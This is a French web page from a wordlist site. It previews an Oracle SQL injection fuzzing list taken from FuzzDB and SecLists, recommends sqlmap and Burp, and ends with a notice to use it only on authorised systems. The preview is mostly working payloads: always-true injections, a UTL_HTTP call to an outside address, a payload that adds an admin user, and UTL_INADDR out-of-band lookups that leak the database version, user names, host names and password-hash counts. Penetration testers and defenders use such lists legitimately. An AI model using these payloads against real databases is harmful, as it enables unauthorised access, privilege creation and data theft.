Skip to content
cyberwordlists
Fuzzing7.7 KB

Oracle SQL Injection (FuzzDB)

Payloads d'injection SQL spécifiques à Oracle exploitant UTL_HTTP, l'exfiltration hors bande via UTL_INADDR et les constructions PL/SQL. Pour sonder les back ends Oracle DB.

Voir la source
Taille
7.7 KB
Catégorie
Fuzzing
Source
danielmiessler/SecLists
Licence
MIT
Outils recommandés
sqlmapburp

Aperçu

Les 15 premières entrées. Téléchargez ou copiez la liste complète (7.7 KB) avec les boutons ci-dessus.

>head oracle-sqli-fuzzdb.txt7.7 KB
# contains statements from jbrofuzz
’ or ‘1’=’1
' or '1'='1
'||utl_http.request('httP://192.168.1.1/')||'
' || myappadmin.adduser('admin', 'newpass') || '
' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i

Payloads d'injection SQL spécifiques à Oracle exploitant UTL_HTTP, l'exfiltration hors bande via UTL_INADDR et les constructions PL/SQL. Pour sonder les back ends Oracle DB.

Cette liste est orientée vers le fuzzing d'entrées et la découverte de vulnérabilités. Elle pèse environ 7.7 KB et s'associe bien avec des outils tels que sqlmap, burp. Choisissez la plus petite liste adaptée à votre mission : les listes plus courtes sont plus rapides et plus discrètes pour les attaques en ligne, tandis que les listes plus volumineuses offrent une couverture plus large pour le travail hors ligne où la vitesse est moins contraignante.

Vous pouvez copier l'aperçu d'exemple directement depuis cette page, copier la liste entière dans votre presse-papiers, ou télécharger le fichier .txt brut. La liste complète est servie directement depuis sa source d'origine sur GitHub.

Provient de danielmiessler/SecLists et distribuée sous licence MIT. N'utilisez les wordlists que contre des systèmes que vous êtes explicitement autorisé à tester.